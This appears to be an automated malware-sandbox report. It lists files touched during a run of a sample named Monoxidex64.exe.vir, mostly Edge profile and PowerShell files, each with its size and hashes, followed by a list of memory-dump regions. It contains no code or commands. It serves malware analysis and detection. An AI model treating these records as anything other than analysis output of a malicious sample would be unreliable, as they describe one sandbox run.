7021ed87f0c97edc3a8ff838202fa444841eafcbfa4e00e722b723393a1ac679279aa744e8edde237a05be6060527a0c7e64a36148bd2d1316d5589d78d08e23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
936B

MD5
111fef5ecb28090fb33ead9edab3f6d5

SHA1
f4f04ba41570997b69fa283e379d8f43dd4ed1b0

SHA256
15ca3096af32547835fe58d10499ae923afcedc9d82314c4d1a6b6e543fcabc3

SHA512
d0453a0a726d9c51a934fb0ca900de785d32435bab337a4412bd6082de1afd00a71c3401275c7959d20b6a3dd737b0d827ec30317e25b9e2d54f7307f2b2d974

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
768B

MD5
6f28f8f75407a8a0788ac6e5bd94c559

SHA1
60a18788f6078d393a97fd608e47c55b81d22acd

SHA256
1f62664ec354a35ec74f2ae25e25ba957004322797b2cf1aee71be1567936a73

SHA512
e08b57a9d520d7c9a394ca25f29f1865a3eb43edb6b17278a4fcd100e9c4dfe72e8c25d8e019e4779ba9fb83cad35db6022b8d5c1f02fc3f292778d9e424f2d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
fa3cd66eee6738f189cc2b8bf7ea0f24

SHA1
aa278d73ec3f9f8260a712a3f2eb37af53c38df8

SHA256
9d44ca43260091b59842cecdccbc3681e1a782bf4d1fee9160c7dcd92e18b829

SHA512
8e5d7a7be24c47f06e09a6ba9a12b12ab0f3c710e394a2bdf223c0eed874d66c17d435c1dae806d715bf7b43d9e7e6a9d70a35df30eea3acc32993b1cb68f90d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
273ae66383c3f2ead5eac2379fa033c1

SHA1
c6e528f791b9929049a643fc209c2847809a4794

SHA256
98e8861de33d7d6e4a09b4ed7d95782a49536cd1aceaf81fba1cfe970f36f4eb

SHA512
da0387776ab0ffbef2371fc99ca39ca5ed7bf059c1287e286414727690e7388cf874abc4a2e36b3e2e3b6efe81879fd36e2a946dbc134a677bf732280640cd5c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
73278f8b816671ca77439789d3390669

SHA1
12043b46b6b4e6fc2931ebc693b3f133d4d17f2a

SHA256
8cf4f61a395026813bbb3d151d0aa6b4e08d5dfa2856da15066ac1170b8c29a4

SHA512
218d34eadeac0bc8a358fc22f8feed4cf33b6ec14112597375acc2d82be09c485a587c4bf2f8ce91d368e9ed5faf84cfac2fb4d8ac6a1fb54924bde24677ab80

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
3bd2096f2b25b0bea884632fab27c6c0

SHA1
d4366c1f4b6238b4cd9a89cb2840ed6d9e62bd5b

SHA256
708e8a36d448c271e88b49a184d88f2b7caaa305d61ed216d1e5ee60dd0e24f7

SHA512
ce4e53610ef6244af161dcb0adc4f31b37bee11ce08f203250f16262e5c2cc891dfa0c4bad7ef9bc7f5b867c30040437418abbb907e9f77d63cd7fabeeafbbc0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
06283bcb22a28733834f60303ea2ff80

SHA1
5a2b63006077c83ac4a6ed0653f13ac01e8f2ac7

SHA256
da558da099743a465f09536d9dde930b13195d6b64506051384dd0ff6ab5fb69

SHA512
44bd897d00234e562d6e5764945862785aa55fec5ffb1fc1451f90b732531dd51903cb76f86efdf53d5255734cb5c501d78b4883e807f8b228fb9d14c4b5a515

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5a759f.TMP

Filesize
1KB

MD5
f579a0cd4fd62702ff79bee226ad0e46

SHA1
a85dc80ed84c78ee7c7655c333ec8a18d84d62bc

SHA256
c6795baff9e693c69accda75161adf2baa7a8ec2931e6659d98d4959ef0f17e6

SHA512
01222848f83ec7feeaca5b50c0adbadaf4f18fed999453f69cce5eaf32cf3fae8f4589acb08fc289ef0ab88a75a330f05bc10526a36929318e52e05b0edc5e40

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
b3c9e50559d3dd2db2dafab362fde349

SHA1
50ec06333ebdce60704971073c2657933eca7fe8

SHA256
2b04fcad1b5b366fee64e1165d5073b0c35fad8341be389d4c7f0da6f7a402d0

SHA512
d9cd44ee10ef135a0da1e5699423bba9b5347618038d148dd3efbdf104d3b15ffd6c3b9e73e7d40e444f8e256abb129497f9a3740fe0697fffda56355f4337b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
aa4f31835d07347297d35862c9045f4a

SHA1
83e728008935d30f98e5480fba4fbccf10cefb05

SHA256
99c83bc5c531e49d4240700142f3425aba74e18ebcc23556be32238ffde9cce0

SHA512
ec3a4bee8335007b8753ae8ac42287f2b3bcbb258f7fc3fb15c9f8d3e611cb9bf6ae2d3034953286a34f753e9ec33f7495e064bab0e8c7fcedd75d6e5eb66629

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
7b9cc3888064fbebf370517eb6fadd82

SHA1
4cdfa0b4498f68fcdeb8c4d19b86b832e2dd0ff8

SHA256
361f303e149701833bd94fd5b5d02593672e8aabb0fe5ebaf8d1da4058751724

SHA512
fae8beebe3496a6f2b1bb9e30dd9951f439d4adc19ccc6a68d7f92ef4ebd3bdc5032cd75cbfd4c7c366951c05f8763903cbe0484ed90f5e1c9e897401670ba1a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
781da0576417bf414dc558e5a315e2be

SHA1
215451c1e370be595f1c389f587efeaa93108b4c

SHA256
41a5aef8b0bbeea2766f40a7bba2c78322379f167c610f7055ccb69e7db030fe

SHA512
24e283aa30a2903ebe154dad49b26067a45e46fec57549ad080d3b9ec3f272044efaaed3822d067837f5521262192f466c47195ffe7f75f8c7c5dcf3159ea737

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ch5gdtuo.zms.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\Monoxidex64.exe.vir.crdownload

Filesize
330KB

MD5
692361071bbbb3e9243d09dc190fedea

SHA1
04894c41500859ea3617b0780f1cc2ba82a40daf

SHA256
ae9405b9556c24389ee359993f45926a895481c8d60d98b91a3065f5c026cffe

SHA512
cfdd627d228c89a4cc2eac27dcdc45507f1e4265eff108958de0e26e0d1abe7598a5347be77d1a52256de70c77129f1cd0e9b31c023e1263f4cf04dbc689c87e

Download Submit
C:\Users\Admin\Downloads\Monoxidex64.exe.vir:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
memory/4036-30-0x00007FFC3A530000-0x00007FFC3AFF2000-memory.dmp

Filesize
10.8MB

Download
memory/4036-32-0x00007FFC3A530000-0x00007FFC3AFF2000-memory.dmp

Filesize
10.8MB

Download
memory/4036-46-0x00007FFC3A530000-0x00007FFC3AFF2000-memory.dmp

Filesize
10.8MB

Download
memory/4036-31-0x00007FFC3A530000-0x00007FFC3AFF2000-memory.dmp

Filesize
10.8MB

Download
memory/4036-21-0x00007FFC3A530000-0x00007FFC3AFF2000-memory.dmp

Filesize
10.8MB

Download
memory/4760-11-0x00007FFC3A530000-0x00007FFC3AFF2000-memory.dmp

Filesize
10.8MB

Download
memory/4760-15-0x00000214F3C10000-0x00000214F3C26000-memory.dmp

Filesize
88KB

Download
memory/4760-0-0x00007FFC3A533000-0x00007FFC3A535000-memory.dmp

Filesize
8KB

Download
memory/4760-14-0x00000214F3BB0000-0x00000214F3BE8000-memory.dmp

Filesize
224KB

Download
memory/4760-47-0x00007FFC3A530000-0x00007FFC3AFF2000-memory.dmp

Filesize
10.8MB

Download
memory/4760-607-0x00000214F3E40000-0x00000214F3E4C000-memory.dmp

Filesize
48KB

Download
memory/4760-10-0x00007FFC3A530000-0x00007FFC3AFF2000-memory.dmp

Filesize
10.8MB

Download
memory/4760-45-0x00007FFC3A533000-0x00007FFC3A535000-memory.dmp

Filesize
8KB

Download
memory/4760-6-0x00000214F38B0000-0x00000214F38D2000-memory.dmp

Filesize
136KB

Download
memory/4760-12-0x00007FFC3A530000-0x00007FFC3AFF2000-memory.dmp

Filesize
10.8MB

Download
memory/4760-13-0x00000214F3BA0000-0x00000214F3BA8000-memory.dmp

Filesize
32KB

Download